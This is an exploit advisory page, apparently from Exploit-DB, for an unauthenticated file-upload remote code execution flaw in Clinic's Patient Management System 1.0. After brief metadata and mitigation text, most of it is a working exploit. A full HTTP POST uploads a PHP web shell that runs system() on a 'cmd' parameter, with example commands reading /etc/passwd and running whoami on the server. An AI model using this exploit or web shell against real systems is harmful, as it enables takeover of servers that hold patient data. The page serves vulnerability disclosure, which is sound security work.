Clinic's Patient Management System 1.0 - Unauthenticated Remote Code Execution

vendor:

Clinic's Patient Management System

by:

Oğulcan Hami Gül

6.1

CVSS

HIGH

Unauthenticated Remote Code Execution (RCE)

CWE

Product Name: Clinic's Patient Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:clinic:patient_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2023

Clinic’s Patient Management System 1.0 – Unauthenticated Remote Code Execution

Unauthenticated users can exploit the Clinic's Patient Management System version 1.0 by uploading a malicious PHP file in place of a profile picture via the /pms/users.php address. This allows attackers to execute arbitrary commands on the server without requiring any authentication.

Mitigation:

It is recommended to implement proper input validation and access controls to prevent unauthenticated users from uploading files. Regular security assessments and code reviews can help identify and mitigate such vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10

## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.

POST /pms/users.php HTTP/1.1

Host: 192.168.1.36

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367

Content-Length: 1054

Origin: http://192.168.1.36

Connection: close

Referer: http://192.168.1.36/pms/users.php

Upgrade-Insecure-Requests: 1



-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="display_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="user_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="password"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"

Content-Type: application/x-php



<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->


-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="save_user"





-----------------------------421755697017784551042596452367--


## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.

## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.